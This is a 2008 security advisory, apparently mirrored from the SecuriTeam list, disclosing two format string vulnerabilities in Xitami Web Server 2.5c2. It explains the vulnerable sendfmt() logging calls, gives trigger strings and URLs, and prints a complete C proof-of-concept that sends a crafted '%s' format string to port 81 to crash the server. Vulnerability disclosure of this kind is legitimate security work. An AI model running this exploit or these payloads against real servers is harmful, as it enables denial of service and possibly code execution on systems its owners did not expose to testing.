Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19656
HistoryApr 15, 2008 - 12:00 a.m.

[NEWS] Xitami Web Server Multiple Vulnerabilities (Exploit)

2008-04-1500:00:00
vulners.com
23

The following security advisory is sent to the securiteam mailing list, and can be found at the
SecuriTeam web site: http://www.securiteam.com

    • promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


Xitami Web Server Multiple Vulnerabilities (Exploit)

SUMMARY

<http://www.xitami.com/&gt; Xitami Web Server is "a small, fast, and
powerful multiplatform Open Source Web Server". Multiple format string
vulnerabilities have been found in Xitami. These vulnerabilities exist
because of the way xitami uses the SMT kernel (Simple Multi Threading
kernel - another iMatix product): some user supplied data is directly
passed to the vsnprintf() and vsprintf() functions inside the sendfmt()
function of the SMT kernel.

DETAILS

Vulnerable Systems:

  • Xitami Web Server version 2.5c2

1st vulnerability: LRWP Request Processing Format String
Beginning with version 2.2a, Xitami includes a persistent CGI extension
called LRWP (Long Running Web Process). LRWP is written as a WSX agent
which implements a simple protocol for communicating with external
processes called Peers. The peer process simply waits for the requests to
come from Xitami and then responds with a valid http response, just like a
CGI program.

A format string vulnerability exists in Xitami's code that logs the LRWP
requests. This vulnerability may permit an attacker to execute arbitrary
code, or at least cause a DoS attack, on a target machine running a
vulnerable version of Xitami Web Server.
The format string can be triggered by sending a special request to the
service (which listens by default on TCP port 81) in the form of:
"%s*100" + "\xFF" + "somestring" + "\xFF"

another example:
"%n" + "\xFF" + "somestring" + "\xFF"

As mentioned before, this bug is not actually located in xitami, but is
caused by the way that xitami uses the vendor's "SMT kernel". If we look
at the source code we can see that xitami calls the sendfmt(); function in
xilrwp.c:
/* Log peer connection */
sendfmt(&operq, "INFO",
LRWP_NAME ": Peer %s connected for %s host",
tcb->rtr->name, tcb->rtr->vhost);

Inside sendfmt();, the user controlled string (tcb->rtr->name) will be
passed to vsnprintf() or vsprintf(), allowing a malicious user to provide
his own format strings:

#if &#40;defined &#40;DOES_SNPRINTF&#41;&#41;
    vsnprintf &#40;formatted, 4096, format, argptr&#41;;
#else
    vsprintf  &#40;formatted, format, argptr&#41;;
#endif

2nd vulnerability: Server Side Includes (SSI) Request Processing Format
String
SSI is a simple server-side scripting language used almost exclusively for
the web. Xitami provides a standard SSI filter and, by default, recognizes
any document with extension '.ssi', '.shtm', or '.shtml' as an SSI
document. A format string vulnerability exists in Xitami's code that logs
the SSI requests. This vulnerability may permit an attacker to execute
arbitrary code, or at least cause a DoS attack, on a target machine
running a vulnerable version of Xitami Web Server.

The format string can be triggered by visiting the following 2 URL's after
each other on the web server (which listens by default on TCP port 80):
http://localhost/&#37;25n.ssi
http://localhost/testssi.ssi

Solution:
A possible solution is to put some input validation on the data before
calling sendfmt(); Another solution is changing sendfmt(); itself.

Exploit:
/**
*

**/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")
#define PORT 81 // target port

int main(int argc, char *argv[]){

int sockfd;
struct hostent *he;
struct sockaddr_in their_addr;
WSADATA wsaData;
char formatstring[250];

if (argc != 2){
printf("\nXitami Web Server 2.5c2\n" );
printf("Format String PoC by bratax - http://www.bratax.be/&#92;n&#92;n&quot;&#41;;
printf("[+] tested on WinXP Pro SP2 & Vista\n");
printf("[+] usage: %s <hostname>\n\n", argv[0]);
return -1;
}

if &#40;WSAStartup&#40;MAKEWORD&#40;1, 1&#41;, &amp;wsaData&#41; != 0&#41; {
fprintf&#40;stderr, &quot;WSAStartup failed.&#92;n&quot;&#41;;
return -1;

}

if ((he=gethostbyname(argv[1])) == NULL){ // get the host info
perror("gethoscattbyname");
return -1;
}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
return -1;
}

their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(PORT); // short, network byte order
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct

if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct
sockaddr)) == -1){
printf("[-] Connect failed.\n");
closesocket(sockfd);
return -1;
}

printf("[+] Server is listeningโ€ฆ\n");

Sleep(1000);

/*
setup format string request:
%s*100 + \xFF + somestring + \xFF (program termination)
or:
%n + \xFF + somestring + \xFF (program crash)
*/

memset(formatstring,'\x41', sizeof(formatstring));
for (int i = 0; i<200; i+=2){
memcpy(formatstring+i, "%s", 2);
}
memcpy(formatstring+200, "\xFF", 1);
memcpy(formatstring+249, "\xFF", 1);

printf("[+] Sending format string requestโ€ฆ");
Sleep(2000);

if (send(sockfd,formatstring,sizeof(formatstring),0) == -1) {
Sleep(2000);
printf("failed! Exitingโ€ฆ\n");
closesocket(sockfd);
WSACleanup();
return -1;
}

Sleep(2000);
closesocket(sockfd);
printf("done.\n");

return 0;
}

// milw0rm.com [2008-04-03]

ADDITIONAL INFORMATION

The information has been provided by <mailto:[email protected]> bratax.
The original article can be found at:
<http://www.bratax.be/advisories/b013.html&gt;
http://www.bratax.be/advisories/b013.html

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
[email protected]
In order to subscribe to the mailing list, simply forward this email to:
[email protected]

====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.